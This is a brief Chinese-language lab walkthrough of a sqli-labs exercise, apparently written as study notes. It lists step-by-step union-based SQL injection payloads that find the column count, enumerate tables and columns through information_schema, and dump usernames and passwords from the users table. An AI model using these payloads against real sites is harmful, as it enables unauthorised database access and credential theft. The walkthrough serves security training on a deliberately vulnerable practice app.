sqli-labs复现
通过在id后面加反斜杠\发现是单引号闭合
1.查询字段数
有3个字段
?id=1' and 1=1 order by 3 -- qwe //正常
?id=1' and 1=1 order by 4 -- qwe //报错
2.查询输出点
?id=1' and 1=2 union select 1,2,3 -- qwe
3.查询库名
?id=1' and 1=2 union select 1,database(),3 -- qwe //库名是security
4.查询表名
有emails,referers,uagents,users表
?id=1' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- qwe
5.查询字段名
查询users表:
有字段:id,username,password
?id=1' and 1=2 union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='users' limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' -- qwe
6.查询数据
?id=1' and 1=2 union select 1,username,3 from users limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(id,0x3a,username,0x3a,password,0x3c,0x68,0x72,0x2F,0x3E),3 from users limit 0,1 -- qwe
0x3a :
0x3c <
0x68 h
0x72 r
0x2F /
0x3E >